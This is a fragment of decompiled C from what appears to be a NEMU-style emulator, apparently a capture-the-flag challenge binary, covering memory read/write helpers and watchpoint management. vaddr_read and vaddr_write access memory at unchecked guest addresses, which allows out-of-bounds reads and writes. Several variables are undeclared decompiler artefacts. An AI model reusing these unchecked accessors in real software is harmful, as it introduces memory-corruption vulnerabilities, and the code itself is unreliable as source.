  bool is_jmp;
  vaddr_t jmp_eip;
  Operand src, dest, src2;
#ifdef DEBUG
  char assembly[80];
  char asm_buf[128];
  char *p;
#endif
} DecodeInfo;

#define PMEM_SIZE (128 * 1024 * 1024)
uint8_t pmem[PMEM_SIZE] = {0};

uint32_t __fastcall vaddr_read(vaddr_t addr, int len)
{
  return *&pmem[addr] & (0xFFFFFFFF >> (8 * (4 - len)));//len==4
}

void __fastcall vaddr_write(vaddr_t addr, int len, uint32_t data)
{
  uint32_t dataa; // [rsp+4h] [rbp-14h] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-10h]

  dataa = data;
  v4 = __readfsqword(0x28u);
  memcpy((addr + 0x6A3B80LL), &dataa, len);
}

void __fastcall set_watchpoint(char *args)
{
  if ( flag )
  {
    v2 = free_;
    v3 = free_->next;
    free_->old_val = v1;
    v2->next = 0LL;
    free_ = v3;
    *v2->exp = *args;
    *&v2->exp[8] = *(args + 1);
    *&v2->exp[16] = *(args + 2);
    *&v2->exp[24] = *(args + 6);
    *&v2->exp[28] = *(args + 14);
    v4 = head;
    if ( head )
    {
      while ( v4->next )
        v4 = v4->next;
      v2->NO = v4->NO + 1;
      v4->next = v2;
    }
    else
    {
      v2->NO = 1;
      head = v2;
    }
  }
}

void __cdecl init_wp_pool()
{
  __int64 v0; // rax
  int i; // edx

  v0 = 141180952LL;
  for ( i = 0; i != 32; ++i )
  {
    *(v0 - 56) = i;
    *(v0 - 48) = v0;
    v0 += 56LL;
  }
  wp_pool[31].next = 0LL;
  head = 0LL;
  free_ = wp_pool;
}